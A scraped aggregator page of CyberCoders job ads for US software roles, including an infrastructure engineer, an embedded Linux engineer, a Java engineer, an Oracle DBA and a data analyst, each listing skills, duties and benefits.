          (USA-CA-Los Angeles) Software Engineer, Infrastructure - Python, PostgreSQL, AWS, GCP      Cache   Translate Page      
Software Engineer, Infrastructure - Python, PostgreSQL, AWS, GCP Software Engineer, Infrastructure - Python, PostgreSQL, AWS, GCP - Skills Required - Python, Gunicorn, Celery, PostgreSQL, AWS, GCP, Finance, Real Estate If you are a Software Engineer, Infrastructure with experience, please read on! We offer 100% financing to PACE approved, energy efficient upgrades to your home or commercial building. If your upgrade saves energy or water, we have you covered with no money out of pocket. We partner with local governments to bring you low cost financing that gets repaid through your property tax bill. The financing can be used for improvements that are good for the environment and save you money on your utility bills. **What You Will Be Doing** - Building out our cloud infrastructure. We haven't started yet, and it will be your job to help design it and build it - Continuous Integration and Deployment are in our future, you'll need to work with our product engineers to define, instrument and build out our deployment pipeline **What You Need for this Position** - Excellent knowledge of Python and Python applications (eg: Gunicorn, Celery) - Working knowledge of relational (PostgreSQL) and distributed Databases - You have a real passion for implementing and building upon cloud computing platforms (especially AWS and GCP) - You have strong systems fundamentals - You believe in automation, testing and instrumentation and have demonstrated it throughout your career - You are an excellent communicator with desire to share and learn - 5+ years of full time industry experience - Degree in Computer Science or related field - Experience in Finance or Real Estate industries **What's In It for You** - Competitive Compensation - Paid Time Off - Medical, Dental & Vision Insurance - 401K So, if you are a Software Engineer, Infrastructure with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Software Engineer, Infrastructure - Python, PostgreSQL, AWS, GCP* *CA-Los Angeles* *GC3-1492994*
          (USA-WA-Bellevue) Embedded Linux Engineer      Cache   Translate Page      
Embedded Linux Engineer Embedded Linux Engineer - Skills Required - Embedded C/C++, Embedded Linux, Linux Drivers, CI/CD tools, Toolchains, Constrained ARM Programming If you are an Embedded Linux Engineer with at least 3 years' experience, please read on! **What You Will Be Doing** You will participate in embedded firmware and Linux development for wireless power applications. This position will involve hands-on C and C++ embedded Linux programming on constrained ARM hardware. Typical duties will include: - Maintaining/creating Linux system build and release - Designing and implementing C/C++ code - Writing unit tests and supporting automated test tools - Managing CI/CD tools for Linux and Embedded IAR toolchains - Document and design new and existing processes **What You Need for this Position** - Deep understanding of embedded C/C++ in embedded systems on Linux - Experience writing./maintaining Linux drivers down to low levels (SPI, I2C, GPIO) - Strong experience with shell scripting and Python or similar - Knowledge of source control/build and CI/CD tools (BitBucket, Jira, Git, Bamboo, Atlassian, etc/) Preferred skills/experience (NOT REQUIRED): - Knowledge of communications protocols and theory at PHY & MAC levels - Experience with Scrum/Kanban, Agile methodologies - Interest or experience in radio, wireless communications and/or IoT **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Bonus - 401k So, if you are an Embedded Linux Engineer with at least 3 years' experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Embedded Linux Engineer* *WA-Bellevue* *DW5-1493003*
          (USA-IA-Urbandale) Senior Java Engineer      Cache   Translate Page      
Senior Java Engineer Senior Java Engineer - Skills Required - RESTful API, AWS, GIT, Java If you are a Senior Java Engineer with experience, please read on! We are looking for a highly engaged Senior Software Engineer to design and develop internal and external web services and integrate with clients and other web services. You will have the opportunity to explore new ideas and solutions and play a major role in how we build our new platform around Applications and Job Sourcing Campaign Management. You will be part of an Agile team culture with people who enjoy shared goals and releasing new product features often. If you like to learn, you will like it here. Our best developers are adept at picking up new things and thrive in our multidisciplinary environment where there are many challenging problems to solve. Whether you consider yourself a front-end or back-end specialist, as long as you are excited about learning and helping others learn, we want to meet you. The successful candidate will be competent in AWS technologies including Java/J2EE Developer and ideally will have worked in all phases of the project life-cycle. We are looking for a positive, flexible and hands-on engineer who is passionate about using emerging technologies and writing quality code. You will be part of a high caliber team consisting of tech, product, and DevOps working in short iterations, building production-ready software. If you're tired of a corporate cubicle job and want to join a fun, passionate team with limitless potential, we would love to meet you. **What You Will Be Doing** -Designs, develops, and implements web-based Java Rest APIs and applications to support business requirements. -Work with UX design to design, create and implement UI components that are engaging and easy to use. -Follows approved life cycle methodologies, creates design documents, and performs development and testing. -Develop unit and integration tests to test your code and integrating with continuous integration and continuous delivery pipelines -Generate swagger and other API documentation -Work with both existing server side rendered pages (JSP) as well as develop responsive Angular based elements and applications for multiple form factors -Quick learner, one who can thrive in a fast-paced environment -Collaborate with Architecture and other team members on the design of projects. -Follow and help influence API and web development standards across the technology organization -Work in a fast paced, agile environment, collaborating with peers from around the world. -Evangelize good software engineering, always be learning. **What You Need for this Position** -Required Knowledge, Skills and Attributes -Strong verbal and written communication skills. -Effective time management skills. -The ability to work in a team atmosphere. -Required Education and/or Experience -Willingness and desire to learn new and different technologies -Six (6) or more years' experience with analyzing, designing, coding, building, testing, and deploying application systems in a business environment. -Experience developing within an Agile environment -Commercial RESTful API design and implementation experience -Experience working in AWS and/or utilizing AWS services. CloudFormation, CloudWatch, API Gateway, Lambda Functions, CloudFront, SQS, SNS, SES, S3, DynamoDB, X-Ray, Step Functions, ECS, EKS, EC2, RDS, Redshift, Kinesis -Experience working with partners and 3rd parties in integrating with their API's -Experience with Git and GitHub -Experience with some of the following technologies or similar technologies: -Java or other OO language, Python, SQL -JavaScript, CSS, Angular, Angular CLI, TypeScript, RXJS, SASS, NPM -Spring Framework, Hibernate, RESTful Web Services -Docker, Tomcat, Linux -Git, Gradle, Jenkins, Artifactory -Postgres, MongoDB -JSON, XML, YAML -Experience with Tomcat and Java Web apps is preferred. -Team player who exhibits effective interpersonal skills with a collaborative style -Experience with Continuous Integration (CI) tools: Jenkins, Cloud Formation, Code Pipeline/Deploy, Terraform or others -Experience with Google Analytics and SEO concepts and validation a plus So, if you are a Senior Java Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Java Engineer* *IA-Urbandale* *CT2-1492971*
          (USA-CO-Boulder) Full Stack Engineer      Cache   Translate Page      
Full Stack Engineer Full Stack Engineer - Skills Required - Ruby On Rails, JSON APIs, HTML, CSS, JavaScript, MySQL, PostfreSQL, ORM, Python, GIT If you are a Full Stack Engineer with experience, please read on! Based in Boulder, we are an agricultural company that provides commercial growers and agronomists with real-time insight and intelligence necessary to enhance farming efficiencies and increase profitability through drone technology. Due to growth, we are seeking a skilled Full stack Engineer to add to our team. If you are interested in hearing more, apply now! **What You Need for this Position** - Ruby On Rails (preferred) or Python - JSON APIs - HTML - CSS - JavaScript - MySQL or PostgreSQL - Docker or some other virtualization technology Nice to have: - Leaflet, Mapbox, Geoserver - GIT **What's In It for You** - Competitive salary - Vacation/PTO - Medical - Dental - Vision - 401k - Company perks and more! So, if you are a Full Stack Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Full Stack Engineer* *CO-Boulder* *CG3-1492741*
          (USA-MA-Boston) Oracle Developer/DBA - Oracle 12c, Amazon RDS, PL/SQL      Cache   Translate Page      
Oracle Developer/DBA - Oracle 12c, Amazon RDS, PL/SQL Oracle Developer/DBA - Oracle 12c, Amazon RDS, PL/SQL - Skills Required - Oracle 12c, Amazon RDS, PL/SQL, Perl, Python, Fintech, Financial Analytics, Oracle DBA, Oracle 11G, Oracle Tuning If you are a Oracle Developer/DBA with experience, please read on! **Top Reasons to Work with Us** Fortune 500 financial firm **What You Will Be Doing** As a member of a highly skilled and growing development team, candidate will be responsible for maintaining our companies Oracle 12c database environment in Amazon RDS as well as development in PL/SQL, Perl and Python. Candidate will learn about Wall Street analytics and will help to support our companies inbound and outbound data feeds. Be at the forefront of high finance and technology. Learn all about Wall Street. Family-friendly work schedule, beautiful office with spectacular views of Boston, fully stocked kitchen and many other benefits. **What You Need for this Position** More Than 3 Years of experience and knowledge of: - Oracle 12c - Amazon RDS - PL/SQL - Perl - Python - Fintech - Financial Analytics - Oracle DBA - Oracle 11G **What's In It for You** Base 125-165k - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k healthcare, dental, commuter benefits, 401K, short and long-term disability, life insurance, 15 vacation/sick days, 9 paid holidays, 5-12 work-at-home days, employee referral bonus program So, if you are a Oracle DBA with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Oracle Developer/DBA - Oracle 12c, Amazon RDS, PL/SQL* *MA-Boston* *CD-1492726*
          (USA-MA-Boston) Oracle DBA & Developer - Oracle 12c, Amazon RDS, PL/SQL      Cache   Translate Page      
Oracle DBA & Developer - Oracle 12c, Amazon RDS, PL/SQL Oracle DBA & Developer - Oracle 12c, Amazon RDS, PL/SQL - Skills Required - Oracle 12c, Amazon RDS, PL/SQL, Perl, Python, Fintech, Financial Analytics, Oracle DBA, Oracle 11G, Oracle Tuning If you are a Oracle DBA with experience, please read on! **Top Reasons to Work with Us** Fortune 500 financial firm **What You Will Be Doing** As a member of a highly skilled and growing development team, candidate will be responsible for maintaining our companies Oracle 12c database environment in Amazon RDS as well as development in PL/SQL, Perl and Python. Candidate will learn about Wall Street analytics and will help to support our companies inbound and outbound data feeds. Be at the forefront of high finance and technology. Learn all about Wall Street. Family-friendly work schedule, beautiful office with spectacular views of Boston, fully stocked kitchen and many other benefits. **What You Need for this Position** More Than 5 Years of experience and knowledge of: - Oracle 12c - Amazon RDS - PL/SQL - Perl - Python - Fintech - Financial Analytics - Oracle DBA - Oracle 11G **What's In It for You** Base 125-165k - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k healthcare, dental, commuter benefits, 401K, short and long-term disability, life insurance, 15 vacation/sick days, 9 paid holidays, 5-12 work-at-home days, employee referral bonus program So, if you are a Oracle DBA with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Oracle DBA & Developer - Oracle 12c, Amazon RDS, PL/SQL* *MA-Boston* *CD-1492715*
          (USA-NY-New York) Senior Data Analyst      Cache   Translate Page      
Senior Data Analyst Senior Data Analyst - Skills Required - Saas/e-commerce, Data Analyst, SQL, Python, ETL Job title: Senior Data Analyst Job Location: New York, NY We are a marketplace that provides licensed cannabis retailers the ability to order from their favorite brands, as well as a suite of software tools for those brands to manage and scale their operation. **Top Reasons to Work with Us** With over 2,000+ dispensaries and more than 500+ leading brands in Colorado, Washington, California, Oregon, Nevada, Maryland, and Arizona, we are setting the industry standard for how cannabis brands and retailers work together. Our team, backed by funding from leading VC's, is poised to define the cannabis wholesale market. Just named one of Fast Company's "Top 10 Most Innovative Companies in Enterprise", joining the ranks of Amazon, Slack, and VMWare - and we're just getting started! **What You Will Be Doing** - Implementing a Business Intelligence tool to help us drive business decisions. - Propose, build, and own our data warehouse architecture and infrastructure. - Own the design and development of automated dashboards. - Drive internal business decisions and directions through establishment of core KPIs - Create industry-defining metrics and standard reporting to help drive the cannabis industry. - Support ad-hoc data analysis or reporting needs from teammates or customers. - Proactively conduct ad-hoc analyses to discover new product and business opportunities. - Develop new metrics to better identify trends and key performance drivers within a particular area of the business. **What You Need for this Position** - 5+ years working at an established SaaS or E-Commerce company - 5+ years working with SQL and other data insight tools - Proficiency in at least one programming language such as Python - Strong grasp of statistics and experience with open source big data technology - 3+ years of working crossing functional to create KPIs which drive or support strategy decisions - 2+ years with ETL processes - Has lead business intelligence implementations efforts such as Periscope, Looker, Tableau, or Domo - Has published industry reports or worked closely with a marketing team to showcase powerful data insights to establish thought leadership **What's In It for You** - Healthcare matching - 3 weeks paid vacation a year - Fun office environment - Competitive salary - Benefit Matching (medical, dental, vision) - Generous stock options - Team events Interviews are ongoing, please complete questions and you will move straight to hiring manager for possible interviews. Incomplete applications will move through HR first. Please complete applications to expedite process. Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Data Analyst* *NY-New York* *BZ2-1493027*
          (USA-CA-Sunnyvale) Full Stack Software Engineer      Cache   Translate Page